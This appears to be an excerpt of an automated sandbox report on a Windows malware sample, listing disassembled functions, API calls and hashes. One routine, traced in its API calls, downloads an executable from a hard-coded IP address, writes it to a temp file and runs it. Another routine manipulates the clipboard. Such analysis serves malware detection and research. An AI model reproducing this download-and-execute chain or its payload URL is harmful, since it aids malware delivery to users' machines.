Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 00404961
__Mtx_init.LIBCPMT ref: 00404987
std::_Cnd_initX.LIBCPMT ref: 004049AA
__Thrd_start.LIBCPMT ref: 004049CF
std::_Cnd_waitX.LIBCPMT ref: 004049EF
std::_Cnd_initX.LIBCPMT ref: 00404A1C

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 3fa71cc7134771a37169c40e31798995eb425162ca5990c928256b46f8ec1ccc
Instruction ID: fe29b10a0a34e5efdd28fe16c7bf2f3382107f798e65333556b620a66e5e0bdf
Opcode Fuzzy Hash: 3fa71cc7134771a37169c40e31798995eb425162ca5990c928256b46f8ec1ccc
Instruction Fuzzy Hash: 70212CB2D042499ADB11EBA99841BDF77B8AF48324F14407FE100B62C1DB7D9A449A79

Function 00401E67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00401E96
__fassign.LIBCMT ref: 00401EA6

Part of subcall function 00401D3B: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00401E0D

_Deallocate.LIBCONCRT ref: 00401EEE

Strings

' @, xrefs: 00401EF5

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: DeallocateIos_base_dtor__fassign_wcslenstd::ios_base::_
String ID: ' @
API String ID: 4127938120-555478085
Opcode ID: 806fb9e52aeaaae0cb616cd8849a277c8abccf51008e77f6e7f38a932110136c
Instruction ID: dfae0518d2e7d321e20c705f8c4246ff05913ba218cd7c5432b80419a94150d6
Opcode Fuzzy Hash: 806fb9e52aeaaae0cb616cd8849a277c8abccf51008e77f6e7f38a932110136c
Instruction Fuzzy Hash: 17010C71F0021C5ADB28EA29DC42AEF7779EF81314F0445BFEA05A2281DD785E858A98

Function 00404A9C Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 00404AB8
__Cnd_signal.LIBCPMT ref: 00404AC4
std::_Cnd_initX.LIBCPMT ref: 00404AD9
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00404AE0

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: ffe9bfedc07032b5432c2f3a1d6749f66fb9470331fdea77942ede815ab60d45
Instruction ID: b2f1577c6e7ffe081edd7183f3d61ebda5dfefdd72c05259b18cfdc5feee6a4c
Opcode Fuzzy Hash: ffe9bfedc07032b5432c2f3a1d6749f66fb9470331fdea77942ede815ab60d45
Instruction Fuzzy Hash: 32F082319047015BE7307B22D80771E76A0AF00318F14843EF095355E2DFBDB9508A6E

Function 004260AC Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00401250,00000004,Function_00025F58,00000000,?,00401250), ref: 004260F5
GetLastError.KERNEL32(?,00401250,?,?,?,00405AF0,00000000,00000000,00000004,004045EA,00000000,00401254,?,?,004049D4), ref: 00426101
__dosmaperr.LIBCMT ref: 00426108

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 78f6e9ad56ecd0df3f6944edac2462687011f7c59343c5bd8a9bea253a572ba6
Instruction ID: d179f42c544f4cc57c6bc8a3beb9b4447bff00939e36de07a3c57fda9f80a494
Opcode Fuzzy Hash: 78f6e9ad56ecd0df3f6944edac2462687011f7c59343c5bd8a9bea253a572ba6
Instruction Fuzzy Hash: 3A01D632704139ABCF159F62FC05AAF3B69EF80360F52006AF90493251DF359820CBE8

Function 0042C8C1 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,0042C970,?,?,00000002,00000000), ref: 0042C8FA
GetLastError.KERNEL32(?,0042C970,?,?,00000002,00000000,?,0042C122,?,00000000,00000000,00000002,?,?,?,?), ref: 0042C904
__dosmaperr.LIBCMT ref: 0042C90B

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: bcc8fc2cb5e11de7be89167320ead38543e87b0294dee71f069ac1dd046d78f8
Instruction ID: 828bd1f08401c938339652c9b6221c485e8ef924c8472554e9ec14e867f15e0b
Opcode Fuzzy Hash: bcc8fc2cb5e11de7be89167320ead38543e87b0294dee71f069ac1dd046d78f8
Instruction Fuzzy Hash: 89016832B10128AFCB15AF59EC4196E3B29DB85321B24021AF914D7290EA749D41CBD8

Function 0042600C Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042A05E: GetLastError.KERNEL32(?,?,?,00426A18,0042CEE8,?,0042A008,00000001,00000364,?,00425F7D,0044EA48,00000010), ref: 0042A063
Part of subcall function 0042A05E: _free.LIBCMT ref: 0042A098
Part of subcall function 0042A05E: SetLastError.KERNEL32(00000000), ref: 0042A0CC

ExitThread.KERNEL32 ref: 0042601E
CloseHandle.KERNEL32(?,?,?,0042613E,?,?,00425FB5,00000000), ref: 00426046
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042613E,?,?,00425FB5,00000000), ref: 0042605C

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: bff4fef03cb55006e2e89e86d8c3ffcdeb25cd2214766234c79cd0b53c881662
Instruction ID: 28b34d45d8beb2e41bd6cac288ce3a48acdc84991e580f543ddbc9835222f629
Opcode Fuzzy Hash: bff4fef03cb55006e2e89e86d8c3ffcdeb25cd2214766234c79cd0b53c881662
Instruction Fuzzy Hash: C4F08030600620ABD735DF39EC086177B98AF05364F454B55FD74C72A1DB3DDC419998

Function 00401D3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00401E0D

Strings

FV@, xrefs: 00401E02

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: FV@
API String ID: 323602529-292262690
Opcode ID: 3c1a3de9cdd4891d5e8167e343542668928e8830d28a218fbb18e776e4942c16
Instruction ID: 2d032c14a8cf649e9b73f16d0ecd8980bac090ef9642258a3017ccea86b9ba0c
Opcode Fuzzy Hash: 3c1a3de9cdd4891d5e8167e343542668928e8830d28a218fbb18e776e4942c16
Instruction Fuzzy Hash: 45213BB4C00219EBCB14EFA5D885AEDBBB4BF44304F50C06EE405B3281EB786A49DF94

Function 00425F58 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(0044EA48,00000010,00000003,0042A05D), ref: 00425F6B
ExitThread.KERNEL32 ref: 00425F72

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: e2afaf5517998c0acb603d0ca32ac227afa4fb9e14db31d226174f3baeb46105
Instruction ID: b2cc63bb5c2f336345de92fc75ecd2a4cd090c25e960ea019d7990d9fe9769d4
Opcode Fuzzy Hash: e2afaf5517998c0acb603d0ca32ac227afa4fb9e14db31d226174f3baeb46105
Instruction Fuzzy Hash: 6DF0AF70A40624AFDB00AFB1E80AB6E7B70FF45704F50055EF506A7292CB78A901CBA9

Function 0042C2F2 Relevance: 1.7, APIs: 1, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c5f7635176b5d431580a740593f271ce1a583bd1ac7b4d7d15a8a23fd58078
Instruction ID: cfc78fd9ee08ef891c126dc78f2f45e981326037858dbb2010c046d3daab8aa2
Opcode Fuzzy Hash: a0c5f7635176b5d431580a740593f271ce1a583bd1ac7b4d7d15a8a23fd58078
Instruction Fuzzy Hash: 1151F771B00124AFDB10DF68D890BBF7BA1EF85368F59829AE8089B351C775AD42C794

Function 00402B1B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402BF8

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 35b20852207ca7991c0fc4a7f70fef41660c6706169916556c86b23173bd01d5
Instruction ID: 4e02dfe6c1ff7f85f4fcec668aef7c56d3095c6a576c02ee8d8868f627abf236
Opcode Fuzzy Hash: 35b20852207ca7991c0fc4a7f70fef41660c6706169916556c86b23173bd01d5
Instruction Fuzzy Hash: 98319E31608716AFD710CE29C98895ABBB4FF84354F04853EFC48973D1D7B8E9548B8A

Function 00403848 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0040384F

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 9093b578438da88e013f97e6ae74870c5cff62aeb66e4f0c6ebd55dc44bf1b6d
Instruction ID: 3209579eba84df6edcb1dfb243a07a4d18a7c76d861e31becc6def6ad7b064ab
Opcode Fuzzy Hash: 9093b578438da88e013f97e6ae74870c5cff62aeb66e4f0c6ebd55dc44bf1b6d
Instruction Fuzzy Hash: 58213871A00205EFCB11EF55C584AAEBBF5BF48705F14C0AEF404AB291C779AE50DB94

Function 0042A6FC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0042A73A

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a7710d831655d0bfc7291cf8af8dbdb256ec15a236758c982b6d9a9924e46363
Instruction ID: 49d8466797fef015f599f68572d1f1da4f3e2206f042e6e321e1e9f2546b0d3f
Opcode Fuzzy Hash: a7710d831655d0bfc7291cf8af8dbdb256ec15a236758c982b6d9a9924e46363
Instruction Fuzzy Hash: 1D112E75A04209AFCF05DF58E94199F7BF5EF48314F5040AAFC09AB311D635EA21CB69

Function 004354E7 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00435528

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d0cdd8f6cde8121300a403c00a23978c139da7e64e7e1467bb6c877c820470ec
Instruction ID: 7a373ea17254698419b6aee83d3671f1b315f2c041ba1aeaa3bfd42ee928f039
Opcode Fuzzy Hash: d0cdd8f6cde8121300a403c00a23978c139da7e64e7e1467bb6c877c820470ec
Instruction Fuzzy Hash: 49F0BE37510108BBCF109E96DC06CEF3B6EEF89334F100156FA1492060DA3ADA21ABA4

Function 0042B6AE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,004062F6,00000000,?,0041E9AB,00000002,00000000,00000000,00000000,?,0040505A,004062F6,00000004,00000000,00000000,00000000), ref: 0042B6E0

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4b4bc532924275edded108b674a62453dd3ae5f764fe89b6bf59903ae1699328
Instruction ID: 36992a251169e8202549a6de5f0594b69914264aa581007ae970023f090a8ecc
Opcode Fuzzy Hash: 4b4bc532924275edded108b674a62453dd3ae5f764fe89b6bf59903ae1699328
Instruction Fuzzy Hash: 7EE06D3130423167DA222A66BC04F6B7B5DEF413A0F994123AD15E62D1DB6DCC41C6EF

Function 00435226 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00435601,?,?,00000000,?,00435601,00000000,0000000C), ref: 00435243

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9d5da9cd1aeaca18f2ef7445d58e9f3b0c49691b01013ac03d3a0117add13dcf
Instruction ID: 3493f74db7e75f5ec0e371851014542546f8e4ee2ea0602b9dc1e5fcc54fb158
Opcode Fuzzy Hash: 9d5da9cd1aeaca18f2ef7445d58e9f3b0c49691b01013ac03d3a0117add13dcf
Instruction Fuzzy Hash: D0D06C3200010DBBDF028F84DD06EDA3BAAFB88714F014010BA1856020C732E921AB95

Function 0040111F Relevance: 1.3, APIs: 1, Instructions: 6sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00003E7F), ref: 00401125

Part of subcall function 00401F05: InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00401F26
Part of subcall function 00401F05: InternetOpenUrlW.WININET(00000000,http://62.204.41.151/ScreenUpdateSync.exe,00000000,00000000,00000000,00000000), ref: 00401F40
Part of subcall function 00401F05: GetTempPathW.KERNEL32(00000105,?), ref: 00401F5C
Part of subcall function 00401F05: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00401F72
Part of subcall function 00401F05: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401FAB
Part of subcall function 00401F05: CloseHandle.KERNEL32(00000000), ref: 0040201A
Part of subcall function 00401F05: ShellExecuteExW.SHELL32(?), ref: 0040207B
Part of subcall function 00401F05: WaitForSingleObject.KERNEL32(?,00008000), ref: 00402090

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: FileInternetOpenTemp$CloseCreateExecuteHandleNameObjectPathShellSingleSleepWait
String ID:
API String ID: 967858820-0
Opcode ID: 0265e7a72ccee363ad6041f7d47d6fd119c68dcbbedd3a7a28a9d80b58a725f2
Instruction ID: dc35c356d30d7a4c4e465493a46c8ae6ff0ff0576c181f91e9a8a68fbb768ce8
Opcode Fuzzy Hash: 0265e7a72ccee363ad6041f7d47d6fd119c68dcbbedd3a7a28a9d80b58a725f2
Instruction Fuzzy Hash: 0CA022B00A80800AE00E3320EC0F80E3A38CBC0303320033FF323080F00FE00802082C

Non-executed Functions

Function 00401C78 Relevance: 13.5, APIs: 9, Instructions: 36clipboardmemoryCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401C7E
GlobalAlloc.KERNEL32(00002002,?,6FBAAF20,00000000,00000000,00402499,00000000), ref: 00401C90
GlobalLock.KERNEL32(00000000,?,6FBAAF20,00000000,00000000,00402499,00000000), ref: 00401C99
GlobalUnlock.KERNEL32(00000000), ref: 00401CAC
OpenClipboard.USER32(00000000), ref: 00401CB4
EmptyClipboard.USER32 ref: 00401CBA
SetClipboardData.USER32(00000001,00000000), ref: 00401CC3
CloseClipboard.USER32 ref: 00401CC9
GlobalFree.KERNEL32(00000000), ref: 00401CD0

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock_strlen
String ID:
API String ID: 91926005-0
Opcode ID: f8d7d4650655c12b741948f5ad6372edff5fe0a334b0927580f1129a4de9b3ce
Instruction ID: 30171743bc8b1316c823ed2e340bd08ce5a7197c4e872815e67d4a996685707a
Opcode Fuzzy Hash: f8d7d4650655c12b741948f5ad6372edff5fe0a334b0927580f1129a4de9b3ce
Instruction Fuzzy Hash: 44F05472101210BFD3102BA1AC4DFAF3F3CEF84766B002569F716860618F745805C7B9

Function 00435BB4 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00435CFA

Strings

